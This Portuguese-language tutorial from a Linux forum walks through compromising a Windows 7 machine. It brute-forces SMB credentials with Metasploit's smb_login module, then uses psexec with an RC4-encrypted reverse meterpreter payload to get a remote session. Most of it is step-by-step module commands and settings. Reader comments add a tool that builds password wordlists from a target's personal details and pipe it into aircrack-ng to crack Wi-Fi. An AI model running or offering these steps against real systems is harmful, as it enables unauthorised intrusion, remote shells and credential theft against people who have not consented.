Pular para o conteúdo

Metaspoit: Brute force + invasão com meterpreter encriptado com RC4

O que é Metasploit Framework? Metasploit Framework é uma ferramenta de código aberto, voltada para o desenvolvimento e lançamento de exploits. Neste artigo, vou demonstrar o uso de 2 módulos desta ferramenta, com o objetivo de comprometer um computador remoto rodando Windows 7.
Perfil removido removido
Hits: 16.400 Categoria: Linux Subcategoria: Segurança
  • Indicar
  • Impressora
  • Denunciar

Preview do alvo e do atacante e execução do módulo de brute force

Saudações, galera.

Resolvi fazer um artigo mostrando um pouco sobre brute force com Metasploit, no caso, no SMB do Windows 7 que muitos ainda têm um certo trabalho, pois não existe um equivalente, digamos assim, de um ms08_067_netapi pro Windows 7 kk. Por isso, vamos fazer uma invasão direta do Windows 7.

Primeiramente, obtendo as credenciais de login por brute force e, posteriormente, vamos executar o modulo psxec, juntamente com o payload meterpreter encriptado em RC4. Vamos lá, então.

Temos aqui nossos "garotos", Kali Linux e Windows 7:
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4   Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

Seguindo então, vamos usar esse módulo auxiliar:

> use auxiliary/scanner/smb/smb_login

As opções:
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

> set pass_file [caminho] # Aqui informaremos o local onde está a wordlist com as senhas a serem usadas.
> set rhosts [IPs] # Aqui vamos informar nossos alvos, ou alvo no caso, rs.
> set threads [N] # Aqui o número de threads, caso prefira pode deixar default também.
> set user_file [caminho] # Aqui informaremos o caminho da wordlist com os nomes de usuários.
> set user_as_pass [false/true] # Caso essa opção esteja habilitada (true) o nome de scan vai tentar usar o nome de usuário como senha também, tipo "admin:admin".

E agora, vamos rodar nosso scan:
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

Execução do módulo 2

Execução do módulo 2 com as credenciais obtidas anteriormente

Certo, aqui para testes, coloquei uma senha fácil, uma wordlist pequena, mas na prática, vai ser um pouco mais complicado.

* Uma dica: fuja de wordlists baixadas na internet, uma wordlist (principalmente de senhas) deve ser feita com base em informações coletadas do alvo.

Voltando aqui, obtemos a credencial administrador:12345, e agora já temos o que é preciso para executar o próximo módulo, o que nos dará acesso ao sistema.

Seguindo..

> use exploit/windows/smb/psexec
> set payload windows/meterpreter/reverse_tcp_rc4
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

E vamos configurar o módulo:

> set rhost [IP] # Aqui colocamos o IP do alvo.
> set smbuser [usuario] # Aqui vai o nome de usuário que obtivemos anteriormente, lembram?
> set smbpass [senha] # Aqui a senha do usuário que obtivemos anteriormente.
> set lhost [ip] # Aqui vamos colocar o IP de onde estará o nosso handler, esperando a conexão.
> set rc4password [string] # Aqui vamos escolher a chave do nosso RC4.
> set lport [N] # Aqui vai a porta onde o handler vai esperar a conexão.
> getuid # Pra sabermos qual nosso usuário atual dentro do sistema.
Linux: Metaspoit - Brute force + invasão com meterpreter encriptado com RC4

Conclusão

Bom, é isso.
É uma execução que pode ser bastante útil.

Fonte:
   1. Preview do alvo e do atacante e execução do módulo de brute force

Incrementando as funções do KDE com "servicemenus"

Xen - xl.conf - Configuração do Host

SimpleBurn: o ultraleve da gravação de CD/DVD

Arquivos de configuração de rede - Parte I - /etc/hosts

Compilando o kernel no Slackware com pacotes pré-compilados

Attik Firewall

Detectando vulnerabilidades com o Nessus

Sudo 1.8.12 - Parte II - Como sudo funciona

SSH completo (passo a passo)

Capturando e-mails da rede com Mailsnarf

#1 Comentário enviado por removido em 29/08/2014 - 12:55h
Valeu ta favoritado!
#2 Comentário enviado por zerotres em 04/09/2014 - 18:35h
Falando em wordlist, eu fiz um pequeno programa em C capaz de gerar senhas realmente funcionais de acordo com dados obtidos e um pouco de criatividade. Pelo menos pra mim ele funciona até melhor que o crunch, cujo 90% das senhas geradas não servem pra nada >.<
O nome é wlmaker e pode ser obtido por meio desse link: http://sourceforge.net/projects/wlmaker/
(deixem um feedback por favor e eu prometo lançar novas versões)

Como funciona:
1. $ echo renan novaes @ > wordlist.tmp
2. $ ./wlmaker wordlist.tmp > wordlist.lst
Resultando num arquivo com as seguintes palavras:
renan
renanrenan
renannovaes
renan@
novaes
novaesrenan
novaesnovaes
novaes@
@
@renan
@novaes
@@
-------------------------------------------------------------------------------------------------
Parece inofensivo no exemplo acima, mas com um dicionário, vc pode formar verdadeiras frases.
No comando echo, fica interessante adicionar 123 1234 abc admin Admin... O nome da pessoa, sobrenome, nome de parentes, ou até datas... Um grep também pode ajudar a filtrar melhor os resultados ;)

COMPILAR É SIMPLES
gcc wlmaker.c -o wlmaker
#3 Comentário enviado por removido em 08/09/2014 - 19:42h
interessante sua ferramenta, vou dar uma testada nela

abç
#4 Comentário enviado por zerotres em 08/09/2014 - 20:14h
Deixa um comentário pra eu saber se o projeto vale a pena!
Obrigado

Ah! Ele funciona com o aircrack

./wlmaker wordlist.lst | aircrack-ng --bssid xx:xx:xx:xx:xx:xx arq.cap -w-

Contribuir com comentário

Entre na sua conta para comentar.